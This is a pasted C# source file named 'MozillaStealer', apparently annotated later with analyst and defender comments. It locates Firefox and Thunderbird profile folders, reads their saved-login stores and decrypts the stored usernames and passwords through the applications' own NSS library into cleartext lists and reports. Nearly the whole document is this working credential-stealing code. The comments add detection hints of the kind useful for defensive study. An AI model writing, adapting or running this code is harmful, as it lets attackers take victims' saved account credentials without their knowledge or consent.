
Untitled

a guest
Jun 26th, 2017
  1. using System;
  2. using System.IO;
  3. using System.Runtime.InteropServices;
  4. using System.Data;
  5. using System.Text;
  6. using System.Threading;
  7. using System.Reflection;
  8. using System.ComponentModel;
  9. using System.Collections;
  10.  
  11. namespace MozillaStealer {
  12.  
  13. static class Stealer {
      // Analyst summary: this class reads the saved-login stores found in Firefox and
      // Thunderbird profile directories (signons.sqlite, signons.txt, signons2.txt,
      // signons3.txt) and passes the stored user names and passwords through the
      // application's own NSS library (PK11SDR_Decrypt) to obtain cleartext, which it
      // returns to the caller. The visible code does not write the results to a file or
      // send them anywhere; what happens to them is decided outside this listing.
      //
      // Defender notes: the behaviour visible here is a process that is not the browser
      // or mail client loading nss3.dll and its companion DLLs from the Mozilla install
      // directory, then opening signons.* files under the user's roaming application
      // data folder. Both events are candidate detection points for endpoint telemetry.
      // NOTE(review): every PK11_Authenticate call below passes 0 as the last argument
      // and no password is supplied anywhere in this file; presumably a profile protected
      // by a primary (master) password would not decrypt this way - confirm against the
      // NSS documentation.
  14.  
      // Managed mirror of the native item structure exchanged with the NSS calls below:
      // a type tag, the address of the data buffer, and the buffer length.
  15. [StructLayout(LayoutKind.Sequential)]
  16. private struct TSECItem {
  17. public int SECItemType;
  18. public int SECItemData;
  19. public int SECItemLen;
  20. }
  21.  
      // Module handle returned by LoadLibrary for nss3.dll; set in NSS_Init, reset to
      // IntPtr.Zero in NSS_Cleanup, and used by every GetProcAddress lookup in between.
  22. private static IntPtr NSS3;
  23.  
      // Picks the Program Files directory that is used as the base of the install path.
      // Returns the "ProgramFiles(x86)" variable when the process is 64-bit
      // (IntPtr.Size == 8) or when PROCESSOR_ARCHITEW6432 is set; otherwise "ProgramFiles".
  24. static string RealProgramFiles()
  25. {
  26. if (8 == IntPtr.Size || (!String.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432"))))
  27. {
  28. return Environment.GetEnvironmentVariable("ProgramFiles(x86)");
  29. }
  30. return Environment.GetEnvironmentVariable("ProgramFiles");
  31. }
  32.  
      // kernel32 imports used to load the Mozilla DLLs and resolve their exports at
      // run time. LoadLibraryEx is declared but not called anywhere in this listing.
  33. [DllImport("kernel32.dll")]
  34. static extern IntPtr LoadLibraryEx(string lpFileName, IntPtr hFile, uint dwFlags);
  35.  
  36. [DllImport("kernel32.dll")]
  37. static extern IntPtr LoadLibrary(string lpFileName);
  38.  
  39. [DllImport("kernel32.dll")]
  40. static extern IntPtr FreeLibrary(string lpFileName);
  41.  
  42. [DllImport("kernel32.dll")]
  43. public extern static IntPtr GetProcAddress(int hwnd, string procedureName);
  44.  
      // Delegate types (cdecl) that describe the NSS exports called through function
      // pointers. The numbered names map to the wrappers below as follows:
      //   DLLFunctionDelegate  - NSS_Init, NSS_Shutdown
      //   DLLFunctionDelegate2 - PK11_GetInternalKeySlot
      //   DLLFunctionDelegate3 - PK11_Authenticate
      //   DLLFunctionDelegate4 - NSSBase64_DecodeBuffer
      //   DLLFunctionDelegate5 - PK11SDR_Decrypt
      //   DLLFunctionDelegate6 - PK11_FreeSlot
      //   DLLFunctionDelegate7 - SECItem_FreeItem
  45. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  46. private delegate long DLLFunctionDelegate(string configdir);
  47.  
  48. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  49. private delegate long DLLFunctionDelegate2();
  50.  
  51. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  52. private delegate long DLLFunctionDelegate3(long slot, bool loadCerts, long wincx);
  53.  
  54. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  55. private delegate int DLLFunctionDelegate4(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen);
  56.  
  57. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  58. private delegate int DLLFunctionDelegate5(ref TSECItem data, ref TSECItem result, int cx);
  59.  
  60. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  61. private delegate int DLLFunctionDelegate6(long slot);
  62.  
  63. [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
  64. private delegate int DLLFunctionDelegate7(ref TSECItem item, bool freeItem);
  65.  
  66.  
  67.  
      // Resolves the "PK11_GetInternalKeySlot" export from the loaded nss3.dll and
      // returns whatever value the native call yields (used below as the slot argument).
  68. private static long PK11_GetInternalKeySlot()
  69. {
  70. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11_GetInternalKeySlot");
  71. DLLFunctionDelegate2 dll = (DLLFunctionDelegate2)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate2));
  72. return dll();
  73. }
  74.  
      // Loads the Mozilla runtime DLLs from <Program Files> + program, stores the
      // nss3.dll handle in NSS3, and calls the native NSS_Init with configdir (the
      // callers pass a profile directory). Any exception is swallowed and reported as 0;
      // no caller in this file inspects the return value.
  75. private static long NSS_Init(string configdir, string program)
  76. {
  77. try
  78. {
  79. string MozillaPath = RealProgramFiles() + program;
  80. DLLFunctionDelegate dll = null;
      // Companion libraries are loaded first; their handles are not kept.
  81. LoadLibrary(MozillaPath + "mozcrt19.dll");
  82. LoadLibrary(MozillaPath + "nspr4.dll");
  83. LoadLibrary(MozillaPath + "plc4.dll");
  84. LoadLibrary(MozillaPath + "plds4.dll");
  85. LoadLibrary(MozillaPath + "ssutil3.dll");
  86. LoadLibrary(MozillaPath + "sqlite3.dll");
  87. LoadLibrary(MozillaPath + "nssutil3.dll");
  88. LoadLibrary(MozillaPath + "softokn3.dll");
  89.  
  90. NSS3 = LoadLibrary(MozillaPath + "nss3.dll");
  91. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "NSS_Init");
  92. dll = (DLLFunctionDelegate)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate));
  93. return dll(configdir);
  94. }
  95. catch
  96. {
  97. return 0;
  98. }
  99. }
  100.  
      // Calls the "NSS_Shutdown" export, issues FreeLibrary for each DLL path used in
      // NSS_Init, and clears the NSS3 handle. Returns 1 on completion, 0 if anything
      // threw. The configdir parameter is not read in this method.
  101. private static long NSS_Cleanup(string configdir, string program)
  102. {
  103. try
  104. {
  105. string MozillaPath = RealProgramFiles() + program;
  106.  
  107. IntPtr pProc1 = GetProcAddress(NSS3.ToInt32(), "NSS_Shutdown");
  108. DLLFunctionDelegate dll1 = (DLLFunctionDelegate)Marshal.GetDelegateForFunctionPointer(pProc1, typeof(DLLFunctionDelegate));
  109. dll1("test");
  110.  
  111. FreeLibrary(MozillaPath + "mozcrt19.dll");
  112. FreeLibrary(MozillaPath + "nspr4.dll");
  113. FreeLibrary(MozillaPath + "plc4.dll");
  114. FreeLibrary(MozillaPath + "plds4.dll");
  115. FreeLibrary(MozillaPath + "ssutil3.dll");
  116. FreeLibrary(MozillaPath + "sqlite3.dll");
  117. FreeLibrary(MozillaPath + "nssutil3.dll");
  118. FreeLibrary(MozillaPath + "softokn3.dll");
  119. FreeLibrary(MozillaPath + "nss3.dll");
  120. NSS3 = IntPtr.Zero;
  121.  
  122. return 1;
  123. }
  124. catch
  125. {
  126. return 0;
  127. }
  128. }
  129.  
      // Thin wrapper: resolves "PK11_Authenticate" from nss3.dll and forwards the
      // arguments unchanged. Every call site in this file passes (slot, true, 0).
  130. private static long PK11_Authenticate(long slot, bool loadCerts, long wincx)
  131. {
  132. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11_Authenticate");
  133. DLLFunctionDelegate3 dll = (DLLFunctionDelegate3)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate3));
  134. return dll(slot, loadCerts, wincx);
  135. }
  136.  
      // Thin wrapper: resolves "PK11_FreeSlot" from nss3.dll and forwards the slot value.
  137. private static int PK11_FreeSlot(long slot)
  138. {
  139. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11_FreeSlot");
  140. DLLFunctionDelegate6 dll = (DLLFunctionDelegate6)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate6));
  141. return dll(slot);
  142. }
  143.  
      // Thin wrapper: resolves "SECItem_FreeItem" from nss3.dll and forwards the arguments.
  144. private static int SECItem_FreeItem(ref TSECItem item, bool freeItem)
  145. {
  146. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "SECItem_FreeItem");
  147. DLLFunctionDelegate7 dll = (DLLFunctionDelegate7)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate7));
  148. return dll(ref item, freeItem);
  149. }
  150.  
      // Thin wrapper: resolves "NSSBase64_DecodeBuffer" from nss3.dll and forwards the
      // arguments. Decrypt() treats the returned int as the address of a TSECItem.
  151. private static int NSSBase64_DecodeBuffer(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen) {
  152. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "NSSBase64_DecodeBuffer");
  153. DLLFunctionDelegate4 dll = (DLLFunctionDelegate4)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate4));
  154. return dll(arenaOpt, outItemOpt, inStr, inLen);
  155. }
  156.  
      // Thin wrapper: resolves "PK11SDR_Decrypt" from nss3.dll and forwards the
      // arguments. Decrypt() treats a return value of 0 as success.
  157. private static int PK11SDR_Decrypt(ref TSECItem data, ref TSECItem result, int cx) {
  158. IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11SDR_Decrypt");
  159. DLLFunctionDelegate5 dll = (DLLFunctionDelegate5)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate5));
  160. return dll(ref data, ref result, cx);
  161. }
  162.  
      // Turns one stored (base64, encrypted) field into text: base64-decodes it with
      // NSSBase64_DecodeBuffer, passes the decoded item to PK11SDR_Decrypt, copies the
      // result buffer into a managed byte array and decodes it as ASCII.
      // Returns string.Empty when decoding fails, decryption fails, or the result is empty.
  163. private static string Decrypt(string value) {
  164. new TSECItem();
  165. TSECItem tSecDec = new TSECItem();
  166. byte[] bvRet;
  167.  
  168. StringBuilder se = new StringBuilder(value);
  169. int tValue = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se, se.Length);
  170. if(tValue != 0) {
      // A non-zero return is read as a pointer to the decoded item.
  171. TSECItem item = (TSECItem)Marshal.PtrToStructure(new IntPtr(tValue), typeof(TSECItem));
  172. if(PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0) {
  173. if(tSecDec.SECItemLen != 0) {
  174. bvRet = new byte[tSecDec.SECItemLen];
  175. Marshal.Copy(new IntPtr(tSecDec.SECItemData), bvRet, 0, tSecDec.SECItemLen);
  176. return Encoding.ASCII.GetString(bvRet);
  177. }
  178. }
  179. SECItem_FreeItem(ref item, true);
  180. }
  181. return string.Empty;
  182. }
  183.  
  184.  
  185.  
      // Text-report overload for the SQLite store. Opens the file at signon through
      // SQLiteBase (a type defined outside this listing), reads moz_disabledHosts and
      // moz_logins, and builds one string with a "No_Saved:" line per disabled-host row
      // and a "URL | User | Password" line per login row, decrypting the last two
      // columns with Decrypt(). Sleeps 500 ms after each login row.
  186. private static string GetSQLEntrys(string signon)
  187. {
  188. string Log = string.Empty;
  189.  
  190. SQLiteBase db = new SQLiteBase(signon);
  191.  
  192. DataTable hostTable = db.ExecuteQuery("SELECT hostname FROM moz_disabledHosts;");
  193. DataTable logins = db.ExecuteQuery("SELECT hostname,encryptedUsername,encryptedPassword FROM moz_logins;");
  194.  
  195. foreach (DataRow row in hostTable.Rows)
  196. {
  197. Log += "No_Saved: " + row.ToString() + "\n";
  198. }
  199.  
      // Failures while obtaining or authenticating to the key slot are ignored.
  200. try
  201. {
  202. long KeySlot = PK11_GetInternalKeySlot();
  203. PK11_Authenticate(KeySlot, true, 0);
  204. }
  205. catch { }
  206.  
  207. foreach (DataRow row in logins.Rows)
  208. {
  209. Log += "URL: " + row[0].ToString() + " | ";
  210. Log += "User: " + Decrypt(row[1].ToString()) + " | ";
  211. Log += "Password: " + Decrypt(row[2].ToString()) + " |\n";
  212.  
  213. Thread.Sleep(500);
  214. }
  215. return Log;
  216. }
  217.  
      // Structured overload for the SQLite store. Returns an ArrayList whose elements
      // are string[3] arrays of { hostname, decrypted user name, decrypted password },
      // one per moz_logins row. The Parsed argument is not read; it only selects this
      // overload. Sleeps 50 ms after each row and calls PK11_FreeSlot at the end.
  218. private static ArrayList GetSQLEntrys(string signon, bool Parsed)
  219. {
  220. string[] Log = new string[3];
  221. ArrayList returnArray = new ArrayList();
  222.  
  223. SQLiteBase db = new SQLiteBase(signon);
  224. DataTable logins = db.ExecuteQuery("SELECT hostname,encryptedUsername,encryptedPassword FROM moz_logins;");
  225.  
  226. long KeySlot = 0;
  227. try
  228. {
  229. KeySlot = PK11_GetInternalKeySlot();
  230. PK11_Authenticate(KeySlot, true, 0);
  231. }
  232. catch { }
  233.  
  234. foreach (DataRow row in logins.Rows)
  235. {
  236. Log[0] = row[0].ToString();
  237. Log[1] = Decrypt(row[1].ToString());
  238. Log[2] = Decrypt(row[2].ToString());
  239. returnArray.Add(Log);
      // A fresh array is allocated so the entry just added is not overwritten.
  240. Log = new string[3];
  241. Thread.Sleep(50);
  242. }
  243.  
  244. try
  245. {
  246. PK11_FreeSlot(KeySlot);
  247. }
  248. catch { }
  249.  
  250. return returnArray;
  251. }
  252.  
      // Text-report overload for the signons*.txt stores. Reads the file line by line:
      // the first line is discarded, lines up to the first "." are reported as
      // "No_Save:" entries, and the remaining lines are consumed as host records whose
      // user and password lines are passed to Decrypt(). A leading "~" on the password
      // line is stripped before decryption. Extra lines are skipped per record when the
      // path contains "signons2.txt" (one line) or "signons3.txt" (two lines).
      // NOTE(review): the record layout is inferred from the read order only; the file
      // format itself is not described anywhere in this listing.
  253. private static string GetTXTEntrys(string path)
  254. {
  255. string Log = string.Empty;
  256. StreamReader signonFile = new StreamReader(path);
  257. signonFile.ReadLine();
  258. string line = string.Empty;
  259.  
  260. long KeySlot = PK11_GetInternalKeySlot();
  261. PK11_Authenticate(KeySlot, true, 0);
  262.  
  263. while ((line = signonFile.ReadLine()) != ".")
  264. {
  265. Log += "No_Save: " + line + "\n";
  266. }
  267.  
  268. line = signonFile.ReadLine();
  269. while (line != null && line != string.Empty)
  270. {
  271. Log += "Url: " + line + " | ";
  272.  
  273. line = signonFile.ReadLine();
  274. while (line != null && line != ".")
  275. {
  276. line = signonFile.ReadLine();
  277. Log += "User: " + Decrypt(line) + " | ";
  278. signonFile.ReadLine();
  279. line = signonFile.ReadLine();
  280. if (line.StartsWith("~"))
  281. {
  282. line = line.Substring(1);
  283. }
  284. Log += "Password: " + Decrypt(line) + "\n";
  285. if (path.Contains("signons2.txt"))
  286. {
  287. signonFile.ReadLine();
  288. }
  289. if (path.Contains("signons3.txt"))
  290. {
  291. signonFile.ReadLine();
  292. signonFile.ReadLine();
  293. }
  294. }
  295. line = signonFile.ReadLine();
  296. }
  297. return Log;
  298. }
  299.  
      // Structured overload for the signons*.txt stores. Returns an ArrayList of
      // string[3] arrays holding the labelled strings "Url: ...", "User: ..." and
      // "Password: ..." for each record. Unlike the string overload there is no separate
      // loop for the lines before the first "."; reading of records starts at the second
      // line of the file. The Parsed argument is not read.
  300. private static ArrayList GetTXTEntrys(string path, bool Parsed)
  301. {
  302. ArrayList returnArray = new ArrayList();
  303.  
  304. StreamReader signonFile = new StreamReader(path);
  305. signonFile.ReadLine();
  306. string line = string.Empty;
  307.  
  308. long KeySlot = PK11_GetInternalKeySlot();
  309. PK11_Authenticate(KeySlot, true, 0);
  310.  
  311. line = signonFile.ReadLine();
  312.  
  313. string[] Log = new string[3];
  314. while (line != null && line != string.Empty)
  315. {
  316. Log[0] = "Url: " + line + " | ";
  317.  
  318. line = signonFile.ReadLine();
  319. while (line != null && line != ".")
  320. {
  321. line = signonFile.ReadLine();
  322. Log[1] = "User: " + Decrypt(line) + " | ";
  323. signonFile.ReadLine();
  324. line = signonFile.ReadLine();
  325. if (line.StartsWith("~"))
  326. {
  327. line = line.Substring(1);
  328. }
  329. Log[2] = "Password: " + Decrypt(line) + "\n";
  330. returnArray.Add(Log);
  331. Log = new string[3];
  332. if (path.Contains("signons2.txt"))
  333. {
  334. signonFile.ReadLine();
  335. }
  336. if (path.Contains("signons3.txt"))
  337. {
  338. signonFile.ReadLine();
  339. signonFile.ReadLine();
  340. }
  341. }
  342. line = signonFile.ReadLine();
  343. }
  344. return returnArray;
  345. }
  346.  
  347.  
  348.  
  349.  
      // Public entry point for Thunderbird. Walks every directory under
      // <ApplicationData>\Thunderbird\Profiles, and for a profile that contains a file
      // whose path matches the pattern "signons.sqlite" runs NSS_Init, the structured
      // SQLite reader and NSS_Cleanup. The result is assigned (not appended), so the
      // returned list holds the entries of the last profile that matched. All exceptions
      // are swallowed and an empty or partial list is returned.
  350. public static ArrayList GetMozillaThunderbirdPass()
  351. {
  352. ArrayList log = new ArrayList();
  353. string thunderbirdPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Thunderbird\Profiles";
  354. try
  355. {
  356. string[] dirs = Directory.GetDirectories(thunderbirdPath);
  357. foreach (string dir in dirs)
  358. {
  359. string[] files = Directory.GetFiles(dir);
  360. foreach (string file in files)
  361. {
  362. if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
  363. {
  364. NSS_Init(dir, @"\Mozilla Thunderbird\");
  365. log = GetSQLEntrys(dir + @"\signons.sqlite", true);
  366. NSS_Cleanup(dir, @"\Mozilla Thunderbird\");
      // Leaves the file loop only; the next profile directory is still visited.
  367. break;
  368. }
  369. }
  370. }
  371. }
  372. catch { };
  373.  
  374. return log;
  375. }
      // Public entry point for Firefox. Same walk as the Thunderbird variant over
      // <ApplicationData>\Mozilla\Firefox\Profiles, with additional branches for the
      // signons.txt, signons2.txt and signons3.txt stores. The first matching file in a
      // profile decides which reader runs. Exceptions are caught and only their message
      // is written to the console.
  376. public static ArrayList GetMozillaFirefoxPass()
  377. {
  378. ArrayList log = new ArrayList();
  379. string firefoxPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\Profiles";
  380.  
  381. try
  382. {
  383. string[] dirs = Directory.GetDirectories(firefoxPath);
  384. foreach (string dir in dirs)
  385. {
  386. string[] files = Directory.GetFiles(dir);
  387. foreach (string file in files)
  388. {
  389. if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
  390. {
  391. NSS_Init(dir, @"\Mozilla Firefox\");
  392. log = GetSQLEntrys(dir + @"\signons.sqlite", true);
  393. NSS_Cleanup(dir, @"\Mozilla Firefox\");
  394. break;
  395. }
  396. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.txt"))
  397. {
  398. NSS_Init(dir, @"\Mozilla Firefox\");
  399. log = GetTXTEntrys(dir + @"\signons.txt", true);
  400. NSS_Cleanup(dir, @"\Mozilla Firefox\");
  401. break;
  402. }
  403. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons2.txt"))
  404. {
  405. NSS_Init(dir, @"\Mozilla Firefox\");
  406. log = GetTXTEntrys(dir + @"\signons2.txt", true);
  407. NSS_Cleanup(dir, @"\Mozilla Firefox\");
  408. break;
  409. }
  410. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons3.txt"))
  411. {
  412. NSS_Init(dir, @"\Mozilla Firefox\");
  413. log = GetTXTEntrys(dir + @"\signons3.txt", true);
  414. NSS_Cleanup(dir, @"\Mozilla Firefox\");
  415. break;
  416. }
  417. }
  418. }
  419. }
  420. catch (Exception x) { Console.WriteLine(x.Message); };
  421. return log;
  422. }
  423.  
      // Public entry point that returns one text report covering both applications:
      // Thunderbird profiles first, then Firefox profiles, using the string-returning
      // readers and appending each profile's output. NSS_Init is called per matching
      // profile; NSS_Cleanup is not called anywhere in this method. Thunderbird errors
      // are swallowed; Firefox errors have their message written to the console.
  424. public static string GetMozillaPass()
  425. {
  426. string log = string.Empty;
  427. string firefoxPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\Profiles";
  428. string thunderbirdPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Thunderbird\Profiles";
  429.  
  430. try
  431. {
  432. string[] dirs = Directory.GetDirectories(thunderbirdPath);
  433. foreach (string dir in dirs)
  434. {
  435. string[] files = Directory.GetFiles(dir);
  436. foreach (string file in files)
  437. {
  438. if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
  439. {
  440. NSS_Init(dir, @"\Mozilla Thunderbird\");
  441. log += GetSQLEntrys(dir + @"\signons.sqlite");
  442. break;
  443. }
  444. }
  445. }
  446. }
  447. catch { };
  448.  
  449. try
  450. {
  451. string[] dirs = Directory.GetDirectories(firefoxPath);
  452. foreach (string dir in dirs)
  453. {
  454. string[] files = Directory.GetFiles(dir);
  455. foreach (string file in files)
  456. {
  457. if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
  458. {
  459. NSS_Init(dir, @"\Mozilla Firefox\");
  460. log += GetSQLEntrys(dir + @"\signons.sqlite");
  461. break;
  462. }
  463. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.txt"))
  464. {
  465. NSS_Init(dir, @"\Mozilla Firefox\");
  466. log += GetTXTEntrys(dir + @"\signons.txt");
  467. break;
  468. }
  469. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons2.txt"))
  470. {
  471. NSS_Init(dir, @"\Mozilla Firefox\");
  472. log += GetTXTEntrys(dir + @"\signons2.txt");
  473. break;
  474. }
  475. else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons3.txt"))
  476. {
  477. NSS_Init(dir, @"\Mozilla Firefox\");
  478. log += GetTXTEntrys(dir + @"\signons3.txt");
  479. break;
  480. }
  481. }
  482. }
  483. }
  484. catch (Exception x) { Console.WriteLine(x.Message); };
  485. return log;
  486. }
  487. }
  488. }